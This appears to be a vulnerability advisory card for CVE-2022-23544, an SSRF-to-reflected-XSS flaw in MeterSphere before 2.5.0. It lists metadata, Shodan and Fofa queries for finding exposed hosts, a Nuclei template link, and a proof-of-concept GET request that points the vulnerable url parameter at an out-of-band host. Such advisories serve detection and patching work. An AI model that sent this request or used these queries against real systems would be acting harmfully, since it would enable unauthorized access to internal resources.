| Title | MeterSphere < 2.5.0 SSRF |
|---|---|
| Author | j4vaovo |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. |
| Remediation | Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.23569 |
| CVE ID | CVE-2022-23544 |
| CWE ID | CWE-918,CWE-79 |
| Shodan Query | html:"metersphere"http.html:"metersphere" |
| Fofa Query | title="MeterSphere"body="metersphere"title="metersphere" |
| Tags | cve2022 cve metersphere ssrf oast xss vuln |
MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in IssueProxyResourceService::getMdImageByUrl allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere’s origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
GET /resource/md/get/url?url=http://oast.pro HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-23544.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-23544.pcap
N/AN/A